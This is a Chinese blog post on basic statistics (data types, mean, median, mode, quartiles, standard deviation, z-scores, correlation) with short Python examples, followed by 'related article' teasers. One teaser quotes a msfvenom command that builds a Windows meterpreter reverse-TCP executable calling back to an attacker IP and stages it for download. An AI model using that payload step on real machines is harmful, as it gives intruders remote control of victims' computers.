数据分析之统计学基础

news2024/11/18 9:34:08

数据分析是现代企业和科研中不可或缺的一部分,而统计学是数据分析的基石。在本篇博客中,我们将介绍统计学的基础知识,涵盖数据类型、描述性统计(集中趋势、离散程度和偏差程度),并通过代码实例加以说明。

一、数据三大类型

在统计分析中,数据通常分为三大类型:分类数据、顺序数据和数值数据。

1. 分类数据

分类数据是指那些可以分为不同类别的数据,但这些类别之间没有内在顺序。例如:性别(男、女)、颜色(红、绿、蓝)。

2. 顺序数据

顺序数据是指可以排序的数据,但不同类别之间的差异不能被量化。例如:评级(好、中、差),满意度(非常满意、满意、不满意)。

3. 数值数据

数值数据是指可以量化并具有明确意义的数字数据。这类数据可以进一步分为离散数据(如人口数量)和连续数据(如身高、体重)。

二、描述性统计 - 集中趋势

描述性统计的集中趋势指标主要包括:众数、中位数、平均数和分位数。

1. 众数

使用场景:数据量大,识别最常见的类别。

常用数据类型:分类数据

import numpy as np
from scipy import stats

data = [1, 2, 2, 3, 3, 3, 4, 4, 4, 4, 5]
mode = stats.mode(data)
print(f"众数: {mode.mode[0]}, 频数: {mode.count[0]}")

优点:简单直观,易于理解。缺点:在多众数情况下可能不适用。

2. 中位数

使用场景:集中趋势分析

常用数据类型:顺序数据、数值数据

median = np.median(data)
print(f"中位数: {median}")

优点:不受极端值影响。缺点:不能利用所有数据。

3. 平均数

分类:简单平均数、加权平均数

使用场景:数据的均衡点

常用数据类型:数值数据

mean = np.mean(data)
print(f"平均数: {mean}")

优点:利用所有数据,计算简单。缺点:受极端值影响大。

4. 分位数

使用场景:反映数据的集中趋势

常用数据类型:数值数据

q1 = np.percentile(data, 25)
q3 = np.percentile(data, 75)
print(f"第一四分位数: {q1}, 第三四分位数: {q3}")

优点:提供数据分布信息。缺点:计算复杂。

三、描述性统计 - 离散程度

描述性统计的离散程度指标主要包括:异众比率、四分位差、极差、标准差和变异系数。

1. 异众比率

使用场景:衡量众数代表性

常用数据类型:分类数据

def heterogeneity_ratio(data):
    mode_count = stats.mode(data).count[0]
    total_count = len(data)
    return 1 - (mode_count / total_count)

hr = heterogeneity_ratio(data)
print(f"异众比率: {hr}")

优点:简单直观。缺点:仅适用于分类数据。

2. 四分位差

使用场景:反映中间50%的数据离散程度

常用数据类型:数值数据

iqr = q3 - q1
print(f"四分位差: {iqr}")

优点:不受极端值影响。缺点:只考虑中间部分数据。

3. 极差

使用场景:反映数据范围

常用数据类型:数值数据

range_ = np.ptp(data)
print(f"极差: {range_}")

优点:计算简单。缺点:受极端值影响大。

4. 标准差

使用场景:数据离散程度

常用数据类型:数值数据

std_dev = np.std(data)
print(f"标准差: {std_dev}")

优点:利用所有数据。缺点:受极端值影响。

5. 变异系数

使用场景:数据变异程度

常用数据类型:数值数据

cv = std_dev / mean
print(f"变异系数: {cv}")

优点:标准化的离散程度指标。缺点:对于均值接近于零的数据不适用。

四、描述性统计 - 偏差程度

1. Z 分数

使用场景:统一量级,增加可比性

常用数据类型:数值数据

z_scores = stats.zscore(data)
print(f"z-scores: {z_scores}")

优点:标准化数据。缺点:需要计算均值和标准差。

2. 协方差和相关系数

使用场景:衡量两个变量的关系

常用数据类型:数值数据

x = [1, 2, 3, 4, 5]
y = [2, 4, 6, 8, 10]

# 协方差
covariance = np.cov(x, y)[0, 1]
print(f"协方差: {covariance}")

# 相关系数
correlation = np.corrcoef(x, y)[0, 1]
print(f"相关系数: {correlation}")

优点:揭示变量间关系。缺点:仅适用于线性关系。

总结:通过理解和应用上述统计学基础知识,可以帮助我们更好地分析和解释数据,提高数据分析的准确性和科学性。希望本篇博客对你有所帮助!

(交个朋友/找资源/ai办公/技术接单,注明来意)

61353774f66242828147d0210ee69159.jpg

 

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1710658.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

释放 OSINT 的力量:在线调查综合指南

开源情报 (OSINT) 是从公开信息中提取有价值见解的艺术。无论您是网络安全专业人士、道德黑客还是情报分析师,OSINT 都能为您提供先进的技术,帮助您筛选海量的数字数据,发现隐藏的真相。 在本文中,我们将深入研究大量的OSINT 资源…

Vue进阶之Vue项目实战(四)

Vue项目实战 出码功能知识介绍渲染器性能调优使用 vue devtools 进行分析使用“渲染”进行分析判断打包构建的产物是否符合预期安装插件使用位置使用过程使用lighthouse分析页面加载情况使用performance分析页面加载情况应用自动化部署与发布CI/CD常见的CI/CD服务出码功能 出码…

AI赋能数字人:打造与语音节奏完美匹配的高质量手势动画

在数字化时代,人机交互正以前所未有的速度进化,而AI数字人的发展正是这一进程中的重要里程碑。近期,一项旨在根据语音内容自动生成匹配手势的技术方案引起了广泛关注,该技术不仅增强了数字人的表现力,也为远程沟通、教育、娱乐等多个领域带来了革新性的应用潜力。本文将深…

【ArcGIS For JS】前端geojson渲染行政区划图层并加标签

原理 通过DataV工具 生成行政区的geojson(得到各区的面元素数据), 随后使用手动绘制featureLayer与Label,并加载到地图。 //vue3加载geojson数据public/geojson/pt.json,在MapView渲染上加载geojson数据 type是"MultiPolygon"fetc…

Web渗透-MySql-Sql注入:联合查询注入

SQL注入(SQL Injection)是一种网络攻击技术,攻击者通过将恶意的SQL代码插入到应用程序的输入字段,从而欺骗应用程序执行未经授权的操作。这种攻击方式可以导致严重的安全问题,包括: 数据泄露:攻…

【MATLAB源码-第216期】基于matlab的北方苍鹰优化算法(NGO)机器人栅格路径规划,输出做短路径图和适应度曲线。

操作环境: MATLAB 2022a 1、算法描述 北方苍鹰优化算法(Northern Goshawk Optimization,简称NGO)是一种新兴的智能优化算法,灵感来源于北方苍鹰的捕猎行为。北方苍鹰是一种敏捷且高效的猛禽,广泛分布于北…

qrcode和qrcodejs2生成二维码+刷新

1、使用qrcode生产二维码&#xff0c;封装组件 创建Qrcode.vue文件 <template><divclass"QRCode":style"{ width: width, height: height }"><canvas:id"canvasId"ref"canvas":style"{ width: width, height: …

上海冠珠旗舰总店盛装开业暨冠珠瓷砖中国美学设计巡回圆满举办

上海&#xff0c;这座融合了东西方文化的国际化大都市&#xff0c;不仅是中国的时尚中心&#xff0c;也是全球潮流的汇聚地。在这里&#xff0c;古典与现代交织&#xff0c;传统与前卫并存&#xff0c;为传统色彩与现代设计的融合提供了得天独厚的条件。 5月25日&#xff0c;上…

分频器对相位噪声影响

本文我们将分析输入时钟被N分频之后的输出时钟的相位噪声如何变化。首先理想分频器的意思是我们假设分频器不会引入附加相位噪声&#xff0c;并且输入和输出时钟之间没有延时。我们假设每一个输出边沿的位置都完美的与输入边沿相对齐&#xff0c;这样便于分析。由于每N个输入时…

简单3步,ERP、OA、CRM等客户端,安全远程访问服务端

如今&#xff0c;企业员工出差远程办公和分支机构的协同工作变得越来越普遍。然而&#xff0c;如何确保在不同地点的员工都能安全、便捷地访问公司内网的C/S&#xff08;Client/Server&#xff09;架构办公系统&#xff0c;是一个亟待解决的问题。 贝锐花生壳内网穿透服务提供…

Elasticsearch8.13.4版本的Docker启动关闭HTTPS

博主环境是&#xff1a; 开发环境&#xff1a;SpringbootElasticSearch客户端对应的starter 2.6.3版本 maven配置 <!-- ElasticSearch --><dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-data-elas…

二叉树习题精讲-相同的树

相同的树 100. 相同的树 - 力扣&#xff08;LeetCode&#xff09;https://leetcode.cn/problems/same-tree/description/ /*** Definition for a binary tree node.* struct TreeNode {* int val;* struct TreeNode *left;* struct TreeNode *right;* };*/ bool i…

MFC 发起 HTTP Post 请求 发送MES消息

文章目录 获取Token将获取的Token写入JSON文件 将测试参数发送到http首先将测试参数写入到TestData.JSON文件rapidjson 库需要将CString 进行类型转换才能使用&#xff0c;将CString 转换为const char* 发送JSON 参数到http中&#xff0c;并且获取返回结果写入TestFinish.JSON文…

msfconsole攻击win10及简陋版

kali 攻击机IP 192.168.1.19 win10 肉鸡 192.168.1.15 使用 msfvenom 生成木马 msfvenom -p windows/meterpreter/reverse_tcp lhost192.168.1.19 lport1234 -f exe >muma.exe 接下来把木马复制到 /var/www/html下 开启 service apache2 start 即可下载&#xff0c;需要做…

效率工作:一键为多种资产添加统一材质(小插件)

1.需求分析&#xff1a; 当导入一批资产&#xff0c;或者有同一批结构体需要添加相同材质时&#xff0c;单独为每个模型都添加材质费时费力&#xff0c;有没有什么办法&#xff0c;能同时为多个资产添加材质。 2.操作实现 1.在网上找到了一款插件&#xff0c;经过验证&#xf…

【数据结构与算法 经典例题】返回单链表的倒数第 k 个节点

&#x1f493; 博客主页&#xff1a;倔强的石头的CSDN主页 &#x1f4dd;Gitee主页&#xff1a;倔强的石头的gitee主页 ⏩ 文章专栏&#xff1a;数据结构与算法刷题系列&#xff08;C语言&#xff09; 期待您的关注 目录 一、问题描述 二、解题思路 方法一:计数器方式 方法…

计算机毕业设计hadoop+spark+hive物流大数据分析平台 物流预测系统 物流信息爬虫 物流大数据 机器学习 深度学习

流程&#xff1a; 1.Python爬虫采集物流数据等存入mysql和.csv文件&#xff1b; 2.使用pandasnumpy或者MapReduce对上面的数据集进行数据清洗生成最终上传到hdfs&#xff1b; 3.使用hive数据仓库完成建库建表导入.csv数据集&#xff1b; 4.使用hive之hive_sql进行离线计算&…

(四十八)第 7 章 图(图的数组(邻接矩阵)存储)

1. 背景说明 2. 示例代码 1) errorRecord.h // 记录错误宏定义头文件#ifndef ERROR_RECORD_H #define ERROR_RECORD_H#include <stdio.h> #include <string.h> #include <stdint.h>// 从文件路径中提取文件名 #define FILE_NAME(X) strrchr(X, \\) ? strrch…

Android项目实战 —— 手把手教你实现一款本地音乐播放器Dora Music

今天带大家实现一款基于Dora SDK的Android本地音乐播放器app&#xff0c;本项目也作为Dora SDK的实践项目或使用教程。使用到开源库有[https://github.com/dora4/dora] 、[https://github.com/dora4/dcache-android] 等。先声明一点&#xff0c;本项目主要作为框架的使用教程&a…

深入探究Java自动拆箱与装箱的实现原理

哈喽&#xff0c;各位小伙伴们&#xff0c;你们好呀&#xff0c;我是喵手。运营社区&#xff1a;C站/掘金/腾讯云&#xff1b;欢迎大家常来逛逛 今天我要给大家分享一些自己日常学习到的一些知识点&#xff0c;并以文字的形式跟大家一起交流&#xff0c;互相学习&#xff0c;一…